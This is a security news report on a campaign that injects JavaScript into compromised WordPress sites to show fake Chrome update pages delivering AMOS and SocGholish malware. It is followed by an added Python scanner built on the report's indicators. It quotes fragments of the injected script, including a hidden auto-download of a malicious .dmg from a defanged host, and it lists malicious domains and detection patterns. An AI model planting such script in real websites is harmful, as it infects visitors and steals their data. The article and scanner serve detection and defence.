A sophisticated cyberattack has compromised over 10,000 WordPress websites, delivering cross-platform malware to unsuspecting users.
The campaign exploits outdated WordPress versions and plugins, redirecting visitors to fake browser update pages that deploy malicious software targeting both macOS and Windows systems.
The attackers injected malicious JavaScript into compromised WordPress sites.
When a user visits one of these sites, the script dynamically generates an iframe displaying a fake Google Chrome update page.
Experts at CSIDE found that the page prompts users to download what appears to be a legitimate update but is, in fact, malware.
The malware includes:
- AMOS (Atomic macOS Stealer): A macOS-targeted infostealer designed to exfiltrate sensitive data like passwords, cookies, and cryptocurrency wallet information.
- SocGholish: A Windows-targeted malware framework that acts as a downloader for additional malicious payloads, including ransomware.
Technical Details & Malware Behavior
The malicious JavaScript is hosted on third-party domains such as https://deski.fastcloudcdn[.]com. The script is highly obfuscated and employs multi-layered encoding to evade detection. Key technical components include:
- Dynamic Script Injection:
    ;(function(o, q, f, e, w, j) {})(); // immediately invoked wrapper; the obfuscated body is omitted here
- Browser Activity Interruption:
    window.stop(); // aborts loading of the legitimate page so the fake one can replace it
- Fake Update Page Injection:
    let frame = document.createElement("iframe");
    frame.srcdoc = rsd; // rsd contains the fake update page content
    document.body.appendChild(frame);
- DNS Prefetching for Malicious Domains:
    <link rel='dns-prefetch' href='//blacksaltys[.]com' />
    <link rel='dns-prefetch' href='//rednosehorse[.]com' />
- AMOS (macOS): Delivered as a .dmg file via dynamically generated download links. The following code snippet automates the download process:
    var btn = document.createElement("a"); // hidden anchor used to trigger the download
    btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/res/C_6.12.4.dmg`;
    btn.download = "C_6.12.4.dmg";
    document.body.appendChild(btn);
    btn.click(); // starts the download without any user interaction
- SocGholish (Windows): Distributed as a JavaScript payload embedded in fake update files. Once executed, it establishes command-and-control (C2) communication for further exploitation.
To mitigate these threats, website administrators should update WordPress core software and plugins, remove unused or outdated plugins and themes, and review logs from the past 90 days to detect unauthorized changes or script injections.
End users should avoid downloading browser updates from unknown sources and use the browser’s built-in update feature, conducting comprehensive system scans if any suspicious downloads occurred.
Additionally, employing advanced client-side monitoring tools and using endpoint protection solutions capable of detecting obfuscated scripts and malicious payloads can further enhance security.
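The technical indicators above (the window.stop() call, the srcdoc iframe, the forced .dmg download, the dns-prefetch hints and the listed domains) can be turned into a simple content check that an administrator runs over served pages or theme and plugin files during the review described above. The scanner below is an added example, not code from CSIDE or from this article; the domain list comes from the report, while the two sample pages are constructed for illustration. A single weak pattern (a dns-prefetch tag, for instance) is not flagged on its own; the scanner reports a page only when at least two behavioural patterns co-occur or a known domain appears.

```python
"""Check HTML/JS content for the injection indicators described in this report.

Added example (not CSIDE's or the article's code). Domains and script patterns
are taken from the report; the sample pages below are constructed for the test.
"""
import re
from dataclasses import dataclass, field

# Domains from the report's indicators of compromise plus the script host and
# the .dmg download host quoted in the technical section (defanging removed).
IOC_DOMAINS = {
    "blacksaltys.com", "fetchdataajax.com", "foundedbrounded.org", "groundrats.org",
    "leatherbook.org", "loopconstruct.com", "modernkeys.org", "objmapper.com",
    "packedbrick.com", "promiseresolverdev.com", "rednosehorse.com",
    "smthwentwrong.com", "variablescopetool.com", "virtualdc.org",
    "deski.fastcloudcdn.com", "extendedstaybrunswick.com",
}

# Behavioural patterns seen in the injected script. Each is weak alone, so a
# page is flagged only when several co-occur or an IoC domain is present.
PATTERNS = {
    "window_stop": re.compile(r"window\.stop\s*\(\s*\)"),
    "srcdoc_iframe": re.compile(
        r"createElement\s*\(\s*['\"]iframe['\"]\s*\)[\s\S]{0,200}?\.srcdoc\s*="),
    "forced_dmg_download": re.compile(r"\.download\s*=\s*['\"][^'\"]*\.dmg['\"]"),
    "dns_prefetch": re.compile(
        r"rel=['\"]dns-prefetch['\"]\s+href=['\"]//([^'\"/]+)", re.I),
}

# Hostnames following "//" in http(s) URLs, including the hxxp defanging style.
HOST_RE = re.compile(r"(?:https?:|hxxps?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)


def refang(text: str) -> str:
    """Turn the report's defanged notation (example[.]com) back into real dots."""
    return text.replace("[.]", ".")


@dataclass
class Finding:
    patterns: list = field(default_factory=list)
    domains: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.domains) or len(self.patterns) >= 2


def scan(content: str) -> Finding:
    """Return the behavioural patterns and IoC domains found in one page or file."""
    finding = Finding()
    text = refang(content)
    for name, rx in PATTERNS.items():
        if rx.search(text):
            finding.patterns.append(name)
    for host in {h.lower() for h in HOST_RE.findall(text)}:
        # Match the domain itself or any subdomain of it.
        if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
            finding.domains.append(host)
    finding.domains.sort()
    return finding


# Constructed sample: a page carrying the injection the report describes.
INJECTED_PAGE = """<html><head>
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<script src="https://deski.fastcloudcdn[.]com/x.js"></script>
</head><body><script>
window.stop();
let frame = document.createElement("iframe");
frame.srcdoc = rsd;
document.body.appendChild(frame);
var btn = document.createElement("a");
btn.href = "hxxps://extendedstaybrunswick[.]com/wp-content/plugins/res/C_6.12.4.dmg";
btn.download = "C_6.12.4.dmg";
btn.click();
</script></body></html>"""

# Constructed sample: a benign page that legitimately uses dns-prefetch and an iframe.
CLEAN_PAGE = """<html><head>
<link rel='dns-prefetch' href='//fonts.example.org' />
</head><body>
<iframe src="https://video.example.org/embed/1"></iframe>
</body></html>"""


if __name__ == "__main__":
    for label, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        result = scan(page)
        print(f"{label}: suspicious={result.suspicious} "
              f"patterns={result.patterns} domains={result.domains}")
```

To apply this to a live site, feed scan() the HTML as served to a browser (the injection is added at request time, so the theme files on disk may look clean) and extend IOC_DOMAINS as new hosts are published.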
Both AMOS and SocGholish are commercially available malware variants sold on platforms like Telegram, which illustrates the growing commercialization of cybercrime.
Cybersecurity experts urge vigilance among website administrators and end-users alike to mitigate the risks posed by such large-scale campaigns.
Indicators of Compromise
Malicious domains identified include:
blacksaltys[.]com
fetchdataajax[.]com
foundedbrounded[.]org
groundrats[.]org
leatherbook[.]org
loopconstruct[.]com
modernkeys[.]org
objmapper[.]com
packedbrick[.]com
promiseresolverdev[.]com
rednosehorse[.]com
smthwentwrong[.]com
variablescopetool[.]com
virtualdc[.]org